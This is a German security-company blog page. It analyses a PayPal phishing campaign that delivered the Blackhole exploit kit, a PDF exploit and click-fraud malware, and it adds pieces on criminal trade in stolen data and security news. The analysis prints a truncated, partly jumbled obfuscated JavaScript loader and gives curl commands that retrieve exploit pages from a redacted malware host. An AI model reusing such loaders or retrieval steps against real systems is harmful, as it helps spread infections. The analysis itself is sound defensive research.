Suche

HomeINSIDERS blog

INSIDER's Blog

Phishing, Malware und Klickbetrug - Analyse einer Malwarekampagne

Die Phishing Mail

Zu unseren Research-Projekten gehören auch einige E-Mail-Adressen die gezielt Spam sammeln um neue Trends in diesem Bereich zu verfolgen. Der hier geschilderte Fall stammt aus einer Phishing E-Mail, die einer Zahlungsbestätigung von Paypal täuschend echt nachempfunden ist. Der Eindruck, dass auf dem eigenen Paypal-Konto eine Falschbuchung stattgefunden hat veranlasst den Nutzer schnell auf die angegebenen Links zu klicken.

Die Paypal-Phishing E-Mail weißt eine erschreckend gute Qualität auf
Die Paypal-Phishing E-Mail weißt eine erschreckend gute Qualität auf

Hinter der gut gemachten Fassade steckte, wie in Phishing-Mails üblich, der Link zu einer Malware-Seite und nicht Paypal. Entscheidend ist, worauf der Benutzer bei dem Klick auf einen der Links stößt: Handelt es sich nur um eine Vertriebsseite für Viagra-Fälschungen oder um ein Exploit-Kit mit dem Malware verbreitet werden soll?

Die Landingpage

Zur Analyse ist es sinnvoll die Webseite nicht mit dem Browser zu öffnen, sondern die hinterlegten Seiten direkt herunterzuladen. Der erste Versuch führte zu einem verblüffenden Ergebnis: Anfragen wurden direkt auf die Webseite von Microsoft weitergeleitet. Zunächst hätte man annehmen können, dass die Phishing-Seite bereits vom Netz genommen wurde. Dies bestätigte sich bei der weiteren Analyse jedoch nicht.

Microsofts Webauftritt als Ziel einer Phishing E-Mail?
Microsofts Webauftritt als Ziel einer Phishing E-Mail?

Wird eine Webseite aufgerufen, sendet der Webbrowser Informationen über den verwendeten Browser und das Betriebssystem mit. Bei der verlinkten Malware-Seite wurde der schädliche Inhalt nur angegeben wenn als Betriebssystem Windows übergeben wurde:

curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) \
 Gecko/20100401 Firefox/3.6.3" http://<ENTFERNT>.net/closest/df7guhoijewpgkegwegko.php

Eine Anfrage mit einem legitim wirkenden Browser lieferte schließlich den wahren Inhalt der Seite. Um die Erkennung des Javascript Codes, der den Browser auf unterschiedliche Plugins untersucht, zu erschweren war dieser nur als Character-Array hinterlegt. Der unten (verkürzt) dargestelle Ausschnitt zeigt den schädlichen Javascript, der erst durch die Auswertung ("Eval" am Schluss des Scripts) lesbar gemacht und danach ausgeführt wird.

<head><title></title></head><body><applet code="hw" archive=
"/closest/df7guhoijewpgkegwegko.php?rhshy=quky&xtqdkvl=bej">
<param name="prime" value="oM8oAiwoeyj%-tieiyjM.BAKDt8Ce_3Aq
eA_eAqtw3D3xM.b11O6tO6qO6oO60Rieb6.O1fO6CO6CO68O1hO6CO6DO6-O
6DRVb6.RCFbFR.tb_" /><param value="Dyy3Ojj?Vl8iKlltK" name="
val"/></applet><script language="javascript">z=[0x76,0x61,0x
72, 0x20,0x70,0x64,0x70,0x64,0x3d,0x7b,0x76,0x65,0x72,0x73, 
0x69,0x6f,0x61,0x6e,0x64,0x6c,0x65,0x72, 0x3a,0x66,0x75,0x6e
, [...] ];s=String.fromCharCode.apply(String,z);if(window.do
66,0x6f,0x2e,0x6a,0x61,0x72,0x22,0x29,0x3b];s=String.fromCha
rCode.apply(String,z);if(window.document)window["eval"](s);
</script></body>cument)window["eval"](s);</script></body>

NodeJS erlaubt es, den Code schnell und sicher lesbar zu machen
NodeJS erlaubt es, den Code schnell und sicher lesbar zu machen

Die Seite versucht zunächst ein Java-Applet einzubinden, dass jedoch zum Zeitpunkt der Untersuchung nicht mehr zu finden war. Es kann aber davon ausgegangen werden, dass es eine der unzähligen Java-Sicherheitslücken ausnutzen sollte die in der jüngsten Vergangenheit bekannt wurden.

Flash? Java? Adobe Reader? Jede Lücke wird genutzt

Der entpackte Code prüft den Webbrowser des Benutzers auf Java, Flash- und Adobe Reader- Versionen und liefert je nach Version eine infiziertes PDF oder Flashfile aus. Der Code sieht aus wie ein klassisches Exploit-Kit und Vergleiche mit unseren Samples deuten auf das weit verbreitete Blackhole Exploit Kit 2 hin. Nachtrag: Eine Google-Suche nach dem String "var pdpd=[..]" bestätigt diese Vermutung.

Im folgenden betrachten wir eines der PDFs, das von dem Exploit Kit ausgeliefert wird. Die Java und Flash-Exploits sind zwar etwas anders gestaltet, führen aber die gleiche Schadsoftware auf dem Rechner des Opfers aus.

Das PDF

Die Exploit-Kit Webseite generiert je nach der vom Webbrowser angegebenen Adobe Reader Version ein anderes PDF, mit dem eine Sicherheitslücke in der jeweiligen Adobe Reader Version ausgenutzt (exploited) werden soll. Gleichzeitig wird eine lange Folge an dynamsich berechneten Werten generiert und an den Webserver übergeben. Sind diese Werte nicht korrekt berechnet, wird kein PDF ausgeliefert, das automatische Scannen nach verwendeten Exploits wird so erschwert. Wir betrachten der Einfachheit hier nur eines der verwendeten PDF-Exploits:

curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" \ 
"http:///<ENTFERNT>.net/closest/df7guhoijewpgkegwegko.php.php?teme=33:1o:1k:1n:1m&oqmswhte=2w:[...]"

Die zu installierende Schadsoftware kann entweder in dem ausgelieferten PDF enthalten sein und würde beim Ausnutzen der Sicherheitslücke von dort direkt in den Speicher geladen werden oder (was typischer ist) die ausgenutzte Sicherheitslücke würde den eigentlichen Schädling von einer weiteren Webseite herunterladen und ausführen.

Es stellte sich zwar heraus, dass der Schädling wie vermutet heruntergeladen wurde, allerdings lag der verwendete Shellcode (Code, mit dem der Speicher auf den nach dem Ausnutzen einer Sicherheitslücke zugegriffen werden kann überschrieben wird) nur in gepackter Form vor. Das PDF enthielt weiteren Javascript-Code, dass den ShellCode erst vorbereitete bevor die etwas ältere Sicherheitslücke (CVE-2009-0927) im PDF-Reader ausgenutzt wird. Der so hinterlegte Code ist für Virenscanner und Firewalls nur schwer zu erkennen.

Die Infektion und der Malware-Download

Der entpackte Shellcode führte schließlich zwei interessante Text-Strings zu Tage:

http://<ENTFERNT>.net/closest/df7guhoijewpgkegwegko.php?fzhzy=33:1o:1k:1n:1m&odngix=[....]

und

C:\DOCUME~1\<ENTFERNT>\LOCALS~1\Temp\wpbt0.dll

Der Erste stellt die Quelle für des Schädlings dar, die Zweite den Ort an dem dieser abgelegt wird und von dem er später ausgeführt werden soll. Interessant ist, dass der Name "wpbt0.dll" ebenfalls der Zielname mehrerer Ransom-Trojaner Dateien ist. Weitere Recherchen ergaben, dass der hier verwendete "Dropper", also der Code mit dem der eigentliche Schädling nachgeladen wird, in vielen Malware Kampagnen verwendet wird.

Die Malware

Rund ein Viertel aller Virenscanner auf Virustotal erkannten unseren Schädling
Rund ein Viertel aller Virenscanner auf Virustotal erkannten unseren Schädling

Die gefundene Malware wurde zum Zeitpunkt der Analyse von etwas mehr als einem Viertel der bei Virustotal hinterlegten Virenscanner als Trojaner oder Virus gekennzeichnet (Mittlerweile erkennt ungefähr die Hälfte der Scanner die Schadsoftware, Stand: 13. März 2013). Bei der Betrachtung der aufgerufenen Windows-Funktionen konnte zunächst angenommen werden, es handle sich bei unserem Fund um Ransomware. Diese These wurde jedoch durch die Ausführung in der virtuellen Machine widerlegt:

Die ausführbare Schadsoftware nistet sich sofort im System ein und löscht die ursprünglich heruntergeladene Datei. Anstatt wie bei einer Ransomware üblich den Rechner des betroffenen Benutzers zu sperren, verbindet sich die Schadsoftware im Hintergrund mit mehreren Steuerungs-Servern (Command & Control) und ruft unterschiedliche Webseiten auf...

Traffic-Analyse

Neben der Kommunikation mit mehreren Command-and-Control-Servern nutzte die analysierte Schadsoftware infizierte Rechner aus um bezahlte Werbeinhalte aufzurufen. Zu Schaden kommen dabei in erster Linie nicht die Besitzer betroffener Computer, sondern Werbetreibende, die wahrscheinlich dem Betreiber der Malwarekampagne Geld für vermeintliche Klicks auf die beworbene Seite bezahlen.

Der in der folgenden Tabelle schematisch beschriebene Ablauf wurde ständig wiederholt und rief die Webseiten unterschiedlicher Werbetreibender auf. INSIDERSKNOWLEDGE hat die bei unserer Analyse betroffenen Unternehmen informiert. Mit einigen dieser Unternehmen arbeiten wir weiterhin daran das Ausmaß des Betrugs zu analysieren. Die Malware verwendete für einzelne Betreiber unterschiedliche Partner-IDs und verwendete unterschiedliche, wechselnde Domains als Referrer (das ist die Ursprungsseite, die beim Klick auf einen Link an den Webserver der Zielseite übergeben wird).

IP-Adresse Domain und Funktion*
83.133.xx.xx xlot(...)el.com:
Zunächst nutzt der Schädling Geo-IP Dienste und einen eigenen Webserver um den Standort des infizierten Computers ausfindig zu machen und so passende Werbung auswählen zu können
217.23.xx.xx vjlv(...)uq.com:
Von dieser Webseite wird eine Reihe von Adressen abgerufen, die verwendet werden um Klicks auf Werbung zu simulieren. Jeder Zieladresse ist dabei auch ein sogenannter Referer, das heißt die Angabe auf welcher Seite der bezahlte Link angeblich abgeklickt wurde, zugeordnet. Die nachfolgende Zeile zeigt beispielhaft einen solchen Aufruf
69.43.xx.xx shagook.com:
Diese Seite wird nie aufgerufen, wird jedoch als "Referer" beim nachfolgenden Aufruf übergeben. Für das Opfer sieht es so aus, als hätte der Benutzer das beworbenen Angebot auf dieser Seite entdeckt und angeklickt
88.198.xx.xx 88.198.xx.xx:
Diese Domain liefert je nach übergebenem Schlüssel die Umleitung zur einer von vielen Opfer-Seiten zurück. Der Browser folgt dieser Umleitung und übergibt dabei eine der Partner-IDs der Kampagnenbetreiber. Für den Werbetreibenden sieht dieser Aufruf aus wie ein legitimer, werbefinanzierter Klick
8x.xx.xx.xx de.OPFER.com*:
Die Zieldomain des Opfers wird mit Angabe einer PartnerID aufgerufen und der komplette Seiteninhalt wird - wie bei einem legitimen Seitenaufruf - geladen, jedoch dem Nutzer nicht angezeigt. Als "Referer" wird ENTFERNT.com/s/?k=fleur+de+lis+tie+pin&enc=[...] übergeben. Für die aufgerufene Webseite sieht es so aus, als hätte der Benutzer auf dieser Seite Werbung angeklickt, diese Seite wurde im ganzen Verlauf jedoch nie aufgerufen.

Von der Malware kontaktierte Webserver
* Die Adressen wurden auf Wunsch des Seitenbetreibers entfernt

C&C-Server

Über UDP werden mehrere Command & Control Server (Port 1133) angesprochen, die große Anzahl von Servern spricht für ein Peer-to-Peer Netzwerk. Der Client sendet an alle Server in regelmäßigen Abständen ein Ping-Signal das wahrscheinlich eine eindeutige ID des Clients enthält. Aus Zeitgründen konnten wir das Protokoll nicht weiter analysieren. Es ist aber davon auszugehen, dass über diesen Weg weitere Komponenten nachgeladen werden können.

Die Malware versucht Kontakt zu einer Vielzahl von Servern aufzunehmen
Die Malware versucht Kontakt zu einer Vielzahl von Servern aufzunehmen

In unserem Testlauf (ca. 30 Minuten) wurden 612 unterschiedliche Server angesprochen, davon antworteten rund drei Viertel. Aus Regelmäßigkeit und Größe der versendeten Pakete kann davon ausgegangen werden, dass nur die Verfügbarkeit der Server geprüft und keine Software nachgeladen wurde.

Zusammenfassung

Der Aufruf einer Phishing E-Mail hätte zum Zeitpunkt der Analyse die meisten Windows-Systeme infiziert und diese missbraucht um Werbelinks aufzurufen. Nur rund ein Viertel der bekannten Virenscanner hätten den Schädling zuverlässig erkannt und die Ausführung verhindert.

Durch die Kontaktaufnahme zu Command & Control Servern hätten zu einem späteren Zeitpunkt weitere Module auf die infizierten Rechner geladen und weitere schädliche Funktionen aktiviert werden können.

Die wirklichen Leidtragenden in diesem Fall sind jedoch die Werbetreibenden, die ohne den Zugewinn an echtem Besucherverkehr Geld für Scheinverkehr bezahlt haben. In unserem "Jahresrückblick 2012" gehen wir detailliert auf die Wertschöpfungskette von Cyberkriminellen ein. Das hier gezeigte Beispiel stellt darüber hinaus eine weitere Möglichkeit dar wie infizierte Rechner für die Betreiber von Botnetzen monetarisiert werden können.

Tools

  • Wepawet - Online Analysetool für schädliche PDFs und Flash Files
  • VirusTotal - Online Virenscanner, mit Infos zu API-Aufrufen und Dateizugriffen
  • JSBeautifier - Macht Java-Script Code besser lesbar
  • Wireshark - Bekanntes Tool zur Analyse des Netzwerkverkehrs

Die Ware der Hacker

Was macht ein Hacker mit erbeuteten Daten?

Hackerangriffe auf Unternehmen wie Sony, LinkedIn, oder Evernote führten in den letzten Jahren zu Diebstahl von Millionen Datensätzen von Kunden, Nutzern oder Mitarbeitern. Auch die Hacktivismus Gruppe Anonymous nutzt die Veröffentlichung von sensiblen Daten und Kundenlisten für ihre Zwecke. Doch was machen Angreifer mit diesen Daten, wieso sind diese wertvoll und was bedeutet es, wenn die eigenen Daten oder Unternehmensdaten vielleicht betroffen sind? Welche Bedrohungen ergeben sich hieraus für Unternehmen und Privatpersonen?

Auf großen Servern liegen wertvolle Daten für Angreifer
Auf großen Servern liegen wertvolle Daten für Angreifer

Hacker und Kriminelle verwerten erbeutete, sensible Daten auf verschiedene Arten. Zum einen werden diese in großen Bündeln gehandelt, für Marktforschung, Werbetreibende, Spam-Versand oder den Versand von Schadsoftware. Möglich sind auch gezielte Spear-Phishing Angriffe per E-Mail auf Unternehmen, die mit Referenzen auf Interna, Kollegen oder Projekte an Authentizität gewinnen und somit das Potential erhöhen, von Opfern geöffnet zu werden. Je persönlicher hierbei der Angriff, desto einfacher ist es das Opfer zu täuschen. Einzelne Kategorien von Daten stellen unterschiedliche Werte dar, und können entweder direkt oder indirekt für Kriminelle verwertet werden.

  • Kreditkarteninformationen
    Kreditkartendaten, also Nummern, Ablaufdatum und CVV-Kontrollnummer können von Kriminellen ohne weiteren Handel direkt für Betrug und Bestellungen auf fremde Rechnung genutzt werden. Hürden hierbei sind das Kreditkartenlimit, die Versandadresse und das Ablaufdatum der Karte, bzw. das Datum einer möglichen Sperre. Kreditkarten aus der EU und den USA mit hohem Kreditlimit sind sehr wertvoll, Karten aus aller Welt mit unbekanntem Kreditlimit werden für zwischen $1 US-Dollar und $200 US-Dollar gehandelt. Der örtliche Unterschied besteht für Kriminelle darin, dass Transaktionen aus dem räumlichen Umfeld des Opfers von Kreditkartenfirmen nicht automatisch als "verdächtig" markiert und sind somit länger gültig. Meist werden diese Daten in Bündeln verkauft. Verwertet werden diese entweder durch die Erstellung gefälschter Kartenkopien, oder durch online Bestellungen. Die Beschaffung hat sich in den letzten Jahren gewandelt, von einzelnen Karten-Scannern an Geldautomaten und Restaurants, hin zum Hack von Bezahldiensten oder Online-Shops wie Mister Spex, bei denen auf einen Schlag viele Nummern gestohlen werden können.

  • E-Mailadressen
    E-Mail-Adressen sind zentrale Daten im Internet. Für Kriminelle und Hacker sind E-Mail Accounts erstes Ziel für Spam Mails, Angriffe mit Schadsoftware oder Werbung. Somit sind für Werbetreibende E-Mail Accounts sowohl als Absender wie auch als Empfänger wertvoll, der Tausend-Kontakt-Preis (TKP) liegt jedoch unter einem US-Dollar. Reine Datenpakete mit E-Mailadressen sind also nur in großen Mengen wertvoll. Eine Verwertung weniger E-Mail Adressen wäre jedoch, zu identifizieren wie in Unternehmen E-Mail Accounts sich aus den Namen der Mitarbeiter zusammensetzen, was zu einer späteren Verwertung weiterer Adressen verwendet werden kann.

  • Login-Namen
    Für Hacker und Kriminelle sind die wertvollsten Login-Namen gleichzeitig auch E-Mail-Adressen, da diese wie bereits beschrieben doppelt verwertet werden können. Login-Namen können Angreifern aber auch Zusammenhänge zwischen Accounts auf verschiedenen Plattformen liefern, Pseudonyme offenlegen und Hinweise auf Verhalten von Nutzern geben. Sie bieten zudem einen Ansatzpunkt für Brute-Force Angriffe.

  • Passwörter
    Der Diebstahl von Passwörtern alleine liefert Angreifern vor allem ein Datenschatz um Programme zur Entschlüsselung von Passwörtern zu füttern. Listen der beliebtesten Passwörter, beispielsweise "password" oder "qwerty", werden dann bei weiteren Angriffen als erstes bei einem "Dictionary" Angriff verwendet, wo Angreifer alle möglichen Kombinationen prüfen um sich einen Zugang zu sensiblen Daten zu verschaffen. Passwörter allein werden jedoch nicht verkauft, haben also keinen direkten finanziellen Wert. In Kombination mit E-Mailadressen und/oder Login-Namen sind Passwörter der Schlüssel zu Accounts auf verschiedenen Plattformen wie E-Mails, Facebook, Twitter etc. Für Angreifer ist dies die schnellste, wertvollste und lukrativste Möglichkeit an sensible Daten zu kommen. Ein weiterer Faktor ist Faulheit der Nutzer, die ein Passwort, oder dessen Schema auf vielen Webseiten und Diensten nutzen und bei einem Verlust an Angreifer an allen Stellen betroffen sind. Genauso ist ein zentraler E-Mail Account mit Passwort wertvoll, da dieser dem Angreifer die Möglichkeit bietet auf den meisten Plattformen ein bestehendes Passwort zu ändern. Der schlimmste Fall ist der Diebstahl des Paypal-Passworts für Nutzer, da dieses dem Angreifer den direkten Zugriff auf die Finanzen

  • "Verschlüsselte Passwörter" = Passworthashes
    Oftmals wird bei Datendiebstählen auf Webseiten davon gesprochen dass nur "verschlüsselte" Passwörter oder Passworthashes entwendet wurden. Dies stellt, je nach Komplexität der Verschlüsselung (hier spricht man oft von "gesalzenen" Hashes), eine Hürde für die Angreifer dar. Gesalzene Passwordhashes, bei denen ein willkürlich generierter Zusatz zum Passwort verschlüsselt wird, kann eine Entschlüsselung erheblich erschweren. Ist dieses "Salz" einzigartig, verzögert sich die Entschlüsselung einer Passwortliste massiv. Dennoch ist dies für betroffene Personen und Unternehmen bei weitem kein Grund zur Ruhe, denn Passworthashes sind mit Hilfe einiger Programme und der Rechenleistung aktueller Grafikkarte schnell entschlüsselt. Die "beruhigende" Aussage, dass nur verschlüsselte Passwörter entwendet wurden, ist also nur ein Aufschub für den determinierten Angreifer, der bald darauf wertvolle Login- und Passwortdaten besitzt und diese für weitere Angriffe nutzen kann.

  • Namen und Adressdaten
    Für Unternehmen verheerend ist der Verlust von Kundendaten. Nicht nur sind Unternehmen, vor allem in Deutschland dem Datenschutzgesetz unterliegend, bei einem Verlust dieser Daten kann auch das Vertrauen von Kunden verloren werden. Je detaillierter der Datensatz, desto schlechter waren die Daten geschützt und die Kunden werden in die Gefahr gebracht unerwünschte Werbung und Spam zu erhalten oder weiteren Angriffen ausgesetzt zu werden. Sony und Path sind nach dem Verlust von Kundendaten, oder dem Missbrauch von Kundendaten zu hohen Geldstrafen verurteilt wurden. Hacker nutzen Namen und Adressdaten für die persönliche Ansprache eines Opfers per Post, E-Mail oder Telefon, um von diesen ein gewisses Vertrauen zu erschleichen. Diese Daten können auch für Marktforschungszwecke verkauft werden. Wie der Fall um Donald Trump und Joe Biden deutlich macht, bieten manche Onlinedienste auch weitere, sensible Informationen zum Kauf an, wenn eine Grundmenge an Informationen abgefragt wird. Diese können von Angreifern dann genutzt werden um sich weitere Daten anzueignen, und dieses Gesamtpaket dann zu missbrauchen.

  • Bankdaten
    Je schneller der Zugriff der Angreifer auf finanzielle Mittel ihrer Opfer, desto höher ist der Wert. Kann ein Angreifer Bankdaten von Unternehmen oder Privatpersonen erlangen, so kann er Geldtransfers einleiten. Hierbei muss jedoch auch zwischen der Veröffentlichung von Kontonummer+Bankleitzahl und Zugriffskennung für Online-Banking unterschieden werden. Letzteres erlangen Angreifer meist nicht über Dienstleister, sondern sammeln die Informationen mit Hilfe von Banking-Trojanern wie Zeus. Sind TAN Listen oder andere Sicherheitsmaßnahmen nicht im Besitz der Angreifer, kann dieser mit Bankdaten des Unternehmens trotzdem falsche Rechnungen schreiben oder sensible Daten extrahieren und veröffentlichen, welche das Unternehmen schaden können. Das gleiche gilt für Privatpersonen, zudem besteht die Gefahr des Identitätsdiebstahls. Der Angreifer kann sich mit Hilfe der Bankdaten für sein Opfer ausgeben, Kredite beantragen und unter falschem Namen Käufe tätigen. Wie im Fall Michelle Obama kann die Veröffentlichung dieser Daten dem Opfer auch schaden.

  • E-Mail-Verkehr
    Wie im Fall HBGary kann die Veröffentlichung von E-Mail Verkehr eines Unternehmens zu großen Schäden an der Reputation von Mitarbeitern und Unternehmen führen. Interne Informationen die über E-Mail ausgetauscht werden können aber auch in den falschen Händen missbraucht werden um am Aktienmarkt zu spekulieren, Kunden abzuwerben oder Strategien zu untergraben. Hat beispielsweise ein Konkurrent Einblick in strategische Planung oder Schwächen, könnte dieser das Wissen ausnutzen. Über präparierte, scheinbar interne E-Mails kann ein Angreifer sich auch Zugang zu weiteren Rechnern im Netzwerk verschaffen, oder Strukturen erkennen um sich weiteren Zugang zu sensiblen Bereichen zu erfragen.

  • Vertrauliche Dokumente, Gehaltsabrechnungen, Konstruktionspläne etc.
    Die Verwertung von Zugängen zu streng vertraulichen Dokumenten oder Netzwerken mit diesen kann vielfältig genutzt werden. Größtmöglicher Gewinn für Angreifer sind vertrauliche Dokumente, Konstruktionspläne oder Betriebsgeheimnisse, da diese für einen hohen Preis verkauft werden können. Die Suche nach potentiellen Käufern für Daten aus Industriespionage wird zusätzlich durch anonyme Kommunikation erleichtert, meist operieren Angreifer in diesem Feld jedoch mit einem klaren Ziel oder Auftrag. Der Angriff auf Sicherheitsfirma RSA beispielsweise hatte zum Ziel sich den Algorithmus für eine Verschlüsselung des Zugangs zum System des Waffenherstellers Lockheed Martin zu verschaffen. Vor allem Staaten wie China werden verdächtigt sehr gezielt nach Wirtschaftsgeheimnissen von westlichen Unternehmen zu suchen. In der weiteren Verwertungskette kann ein Angreifer den Zugriff verkaufen oder vermieten, oder den Netzwerkzugang zur Vergrößerung eines Botnetzes nutzen, die Rechner also für sich arbeiten lassen. Das Botnetz wiederum lässt sich auch vermieten oder verkaufen. Erst im letzten Schritt, wenn der Zugriff bemerkt oder verhindert wird, veröffentlichen Angreifer die vertraulichen Daten um weiteren Schaden zu verursachen. Bei Hacktivisten steht die Bloßstellung im Vordergrund, in diesen Fällen wird ein Einbruch in einen Server meist schnell veröffentlicht.

  • Fernzugriff auf Rechner Das wohl wertvollste Gut im Internet ist die Hoheit über einen fremden PC. Ob es ein reiner Zugriff auf Webcam und Eingaben des Nutzers sind, die von "RATtern" genutzt und getauscht werden um sich an der Hilflosigkeit ihrer Opfer zu belustigen, oder die Erstellung eines massiven [Botnetzes] aus Tausenden von Rechnern, die zum gezielten Angriff, Überlastung von Servern, Bitcoin-Mining oder Spam-Versand benutzt werden.

Inzwischen werden auch gezielt Unternehmensrechner an Interessenten verkauft, die diese dann nicht für ihre Rechenleistung nutzen, sondern im Detail die darauf abgelegten Daten nach sensiblen Informationen absuchen. Für Unternehmen ist die fremde Kontrolle interner Rechner ein großes Problem, da nicht nur Unternehmensdaten gefährdet sind, sondern bei einer Strafverfolgung von DDoS-Angriffen die Spur meist zu den Angriffsrechnern nachvollzogen wird, nicht aber zu den Drahtziehern im Hintergrund. Auch können auf diesen Rechnern Webseiten betrieben werden, auf denen Malware-Seiten, illegale Inhalte oder Ähnliches betrieben wird.

Botnetze beispielsweise werden in Foren vermietet, Preise schwanken zwischen $2 US-Dollar pro Stunde oder mindestens $700 US-Dollar für den Kauf eines Botnets. Diese Preise schwanken mit der Größe der Netze, und somit der Größe eines möglichen Angriffs, sowie der Dauer der Anmietung.

Weitere Ziele sind inzwischen auch Smartphones, da ein Zugriff hierauf nicht nur private E-Mails und Daten sowie GPS-Positionierung möglich macht, sondern auch Premium-SMS versendet werden können. Dies macht es wirtschaftlich lukrativ, gezielt Mobilgeräte zu infizieren. Smartphones können zudem auch Teil eines Botnetzes werden, oder als Einfallstor in ein Firmennetzwerk dienen, sind sie einmal in der Hand eines Angreifers mit der Absicht dort größtmöglichen Schaden zu verursachen oder Daten zu entwenden.

Bannerwerbung für DDoS als Dienstleistung
Bannerwerbung für DDoS als Dienstleistung

Wie man sich am besten schützt und welche Maßnahmen im Fall eines Angriffs zu treffen sind finden Sie in Der Markt für Hacker

Seite 4 von 8

INSIDERSKNOWLEDGE Nachrichten

INSIDERSKNOWLEDGE Nachrichten abonnieren

14. Oktober 2014

Unsere Nachrichten sind Umgezogen! Aktuelle IT-Sicherheits News finden Sie nun auf IKSec.de. Von Anfang an war Aktualität für uns ein entscheidender Faktor, um unseren Kunden stets optimal beraten zu können. Zu diesem Zweck begannen wir täglich die wichtigsten Ereignisse und Veröffentlichungen aus dem Bereich IT-Sicherheit zusammenzutragen und – zunächst – als internen Newsletter zu dokumentieren.

Das positive Feedback führte dazu, dass wir die “Nachrichten” Kategorie auf unserer Webseite einführten und seit Mitte 2012 dort veröffentlichten. Dieser Bereich wurde schnell der beliebteste und meist aufgerufene Bereich unserer Webseite und stellt bis heute eine der besten deutschsprachigen Übersichten zum Thema IT-Sicherheit dar.

Spätestens seit dem NSA-Skandal hat das Thema IT-Sicherheit ein so breites Interesse erfahren, dass wir uns entschieden haben die INSIDERSKNOWLEDGE Nachrichten auf ein eigenes Portal auszulagern. IKSec.de ist ein neues Experiment für uns, mit dem wir hoffen, eine bereite Zielgruppe zu diesem wichtigen Thema erreichen zu können

13. Oktober 2014

Neue Dokumente aus den Leaks von Edward Snowden belegen, dass die NSA auch innerhalb deutscher und anderer europäischer Unternehmen Agenten platziert hat. Unter dem Namen TAREX (Target Exploitation) wird ein Programm beschrieben dass mittels eigener oder angeworbener Agenten langfristige Spionage und Sabotage Aktionen in nicht US-Unternehmen ermöglichen soll. Die Dokumente verdeutlichen damit, wie wichtig es dem amerikanischen Geheimdienst ist, Verschlüsselungen umgehen zu können und die Möglichkeit zu haben, gezielte Hintertüren in Soft- und Hardware zu platzieren. Aus den Dokumenten geht außerdem hervor, dass diese Operationen unter einer Geheimhaltungsstufe über "Top Secret" laufen. Top Secret galt bisher als die höchste bekannte Geheimhaltungsklassifizierung
Link zur Quelle

Aus einem BBC Interview mit dem Leiter des Europol Cybercrime Centre, Troels Oerting, geht hervor, dass die Polizei einen Großteil aller Cybercrime Fälle auf rund 100 Hintermänner zurückführt. Zu den größten Herausforderungen gehören laut Troels, dass die meisten Kriminellen aus dem russischsprachigen Ausland heraus agieren und daher nur schwer verfolgt werden können
Link zur Quelle

Ein Hackerangriff auf den Dienst SnapSaved führte offenbar zur Veröffentlichung der Bilder von hundert tausenden SnapChat Nutzern. Nach Angaben von SnapChat wurde das Unternehmen von dem Hackerangriff nicht betroffenen sondern lediglich ein - mittlerweile eingestellter - externer Dienst. SnapChat erlaubt es Bilder zu versenden, die nach kurzer Anzeige gelöscht werden. Aus diesem Grund wird der Dienst häufig zum "Sexting" unter jugendlichen Verwendet. Der Großteil der Zielgruppe von SnapChat ist zwischen 13 und 17 Jahren alt. Dieser junge Altersdurchschnitt sorgte angeblich auch dafür, dass die Bilder auf 4Chan und anderen Seiten nicht intensiv verbreitet wurden
Link zur Quelle

Die Electronic Frontier Foundation weißt in einem neuen Artikel darauf hin, dass es nicht möglich ist eine kryptografische Hintertür zu entwickeln, die nur von Strafverfolgungsbehörden und nicht von kriminellen benutzt werden kann. Die EFF geht damit auf einen Artikel in der Washington Post ein, der eine Schwächung der Verschlüsselung von iOS 8 und Android Geräten gefordert hatte
Link zur Quelle